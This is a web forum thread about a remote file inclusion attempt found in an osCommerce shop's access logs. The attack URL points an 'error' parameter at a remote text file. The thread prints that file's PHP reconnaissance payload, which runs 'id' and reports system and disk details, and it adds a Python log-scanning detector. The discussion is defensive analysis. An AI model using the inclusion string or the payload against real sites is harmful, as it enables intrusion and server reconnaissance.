
GothicBeast

Is this a new hack attempt? "errors.php?error=http"


Hi,

First, I did go through and search for any information on this string but could not find anything on the web or on the OSC support forum.

- If this is duplicate info, I am sorry for my poor searching.

Anyway, on to the info... Today, looking through my logs, I found an interesting string.

- http://xxxxxxxxxxxxxxxxx/xxxxxxxx/index.php?cPath=27//errors.php?error=http://r20.XXXXXXXXXXXXXXXXX.com.br/web/XXXXXXXXXXXXXXX/XXXXXXXXXX.txt???

I don't have an errors.php file, and I pulled the ".txt" file that it was calling. That file looks to be some PHP code.

- The code also has a signature at the end. I figured the signature is related to the author and that this may be a file from a hacking tool kit.

Anyway, I searched for the code through the website and did not find any of the code or modified files on my end.


Looks like the forum reduced the http string.

 

//xxxxxxxxxxxxxxxxx/xxxxxxxx/index.php?cPath=27//errors.php?error=http://r20.XXXXXXXXXXXXXXXXX.com.br/web/XXXXXXXXXXXXXXX/XXXXXXXXXX.txt???

 

The key part is the use of an errors.php and a call string to a text file through the web.


They will probably be trying to get the contents of xxxxx.txt to run as PHP within the error.php code. What are the contents, by the way (of that txt file)?


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
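
A defender's view of the request shape discussed in this thread, as an added example that is not part of any post: a Python check that flags access-log entries whose query string carries an embedded remote URL. The log lines, host names and addresses are constructed, and the function names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request target inside a combined-format access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A remote URL anywhere inside a parameter value, not only at its start.
REMOTE_URL_RE = re.compile(r'(?:https?|ftp)://[^\s&]+', re.IGNORECASE)

def find_remote_includes(log_line):
    """Return (parameter, embedded URL) pairs found in one log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    hits = []
    query = urlsplit(m.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl percent-decodes once; decode again so double-encoded
        # values (http%253A%252F%252F...) are still recognised.
        for url in REMOTE_URL_RE.findall(unquote(value)):
            # Trailing "?" characters are commonly appended to neutralise
            # any suffix the include statement adds; strip them for reporting.
            hits.append((name, url.rstrip("?")))
    return hits

def scan(lines):
    """Return (line number, parameter, URL) for every suspicious entry."""
    return [(n, p, u) for n, line in enumerate(lines, 1)
            for p, u in find_remote_includes(line)]

# Constructed sample entries (documentation addresses, .invalid hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2012:10:00:01 +0000] "GET /shop/index.php?cPath=27&sort=2a HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2012:10:00:09 +0000] "GET /shop/index.php?cPath=27//errors.php?error=http://r20.example.invalid/web/a/b.txt??? HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2012:10:00:12 +0000] "GET /shop/index.php?error=http%253A%252F%252Fhost.invalid%252Fc.txt HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for line_no, param, url in scan(SAMPLE_LOG):
        print(f"line {line_no}: parameter {param!r} carries {url}")
```

For the request shape in the first post the hit is reported under `cPath`, because the whole `//errors.php?error=http://...` string is the value of that one parameter, so a filter keyed on a parameter named `error` would miss it. Parameters that legitimately carry URLs, such as redirect targets, need an allowlist before this is used for alerting.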


They will probably be trying to get the contents of xxxxx.txt to run as PHP within the error.php code. What are the contents, by the way (of that txt file)?

 

<?php

function ConvertBytes($number) {
    $len = strlen($number);
    if($len < 4) {
        return sprintf("%d b", $number);
    }
    if($len >= 4 && $len <=6) {
        return sprintf("%0.2f Kb", $number/1024);
    }
    if($len >= 7 && $len <=9) {
        return sprintf("%0.2f Mb", $number/1024/1024);
    }
    return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

echo "DuXCr3w<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "DuXCr3w was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

--------------------------------------------------->DuXCr3w<----------------------------------------------------------------

re_nero H4ck3D MaGoNeRo


If they were able to trigger that function above then the most they would have got from that would have been the username of the admin of the operating system and how much free space there is on that webserver. That code would not overwrite any files.

 

Can you PM me the actual URL to that txt file link? I want to test it on my test site to see what, if anything, it would produce.


Can you pm me the actual URL to that txt file link, I want to test it on my test site to see what if anything it would produce.

Done


Thanks for that.

